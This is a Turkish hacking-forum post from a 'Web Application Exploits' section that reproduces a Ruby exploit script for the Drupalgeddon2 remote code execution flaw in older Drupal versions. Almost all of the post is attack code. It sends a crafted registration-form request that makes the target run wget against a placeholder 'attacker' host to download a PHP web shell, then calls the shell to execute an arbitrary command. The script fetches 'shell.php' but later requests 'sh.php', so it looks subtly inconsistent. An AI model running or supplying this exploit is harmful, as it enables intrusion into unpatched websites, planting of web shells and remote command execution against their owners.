1.                        

Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution

'Web Application Exploits' forumunda KaliBot tarafından 16 Nisan 2018 tarihinde açılan konu

  1. KaliBot

    KaliBot Albay

    Katılım:
    30 Haziran 2015
    Mesaj:
    533
    Beğeniler:
    40
    Ödül Puanları:
    12
    Web Sitesi:
    Kod:
    # EDB-Note. Have the contents of "shell" on http://attacker/shell.php
    require 'net/http'
    # Hans Topo ruby port from Drupalggedon2 exploit.
    # Based on Vitalii Rudnykh exploit
    target = ARGV[0]
    command = ARGV[1]
    url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
    shell = "<?php system($_GET['cmd']); ?>"
    payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec'
    uri = URI(url)
    http = Net::HTTP.new(uri.host,uri.port)
    if uri.scheme == 'https'
        http.use_ssl = true
        http.verify_mode = OpenSSL::SSL::VERIFY_NONE
    end
    req = Net::HTTP::Post.new(uri.path)
    req.body = payload
    response = http.request(req)
    if response.code != "200"
        puts "[*] Response: " + response.code
        puts "[*] Target seems not to be exploitable"
        exit
    end
    puts "[*] Target seems to be exploitable."
    exploit_uri = URI(target+"/sh.php?cmd=#{command}")
    response = Net::HTTP.get_response(exploit_uri)
    puts response.body
     

Bu Sayfayı Paylaş

Share